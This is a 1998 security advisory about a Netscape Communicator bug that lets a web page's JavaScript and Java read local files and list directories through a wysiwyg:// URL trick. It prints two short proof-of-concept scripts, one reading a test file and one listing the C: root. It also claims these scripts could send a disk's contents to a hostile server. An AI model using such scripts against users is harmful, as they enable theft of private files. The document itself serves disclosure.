Netscape browser bug allows reading of local files.
8 Dec. 1998
Summary
Netscape Communicator for Windows and UNIX was found to be vulnerable to a bug that allows the reading of locally stored files from the user's computer without the user's authorization and knowlage.
The bug that was discovered allows the reading of local files, browsing though directories and all of it by a malicious JavaScript and Java applets. The file name or directory name doesn't have to be known, because you can create a JavaScript can be made to recursively send all the hard disk's content back to the malicious web page's web server.
The source code of the JavaScript follows:
sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && (i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
The principle of the exploit is based on the idea the JavaScript and Java applets that run off the local hard disk should be "trusted" fully, and granted full access to the local computer.
Another example that was provided by Terence Christopher Haddock follows:
sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";
This more advanced version has a "search" algorithm that enable the malicious JavaScript to search (recursively) for a specific file inside the local hard disk. The only disadvantage of this script is that it opens large amount of windows, showing each directory it traversed into. This might be avoided by creating these windows inside frames, instead of inside windows.
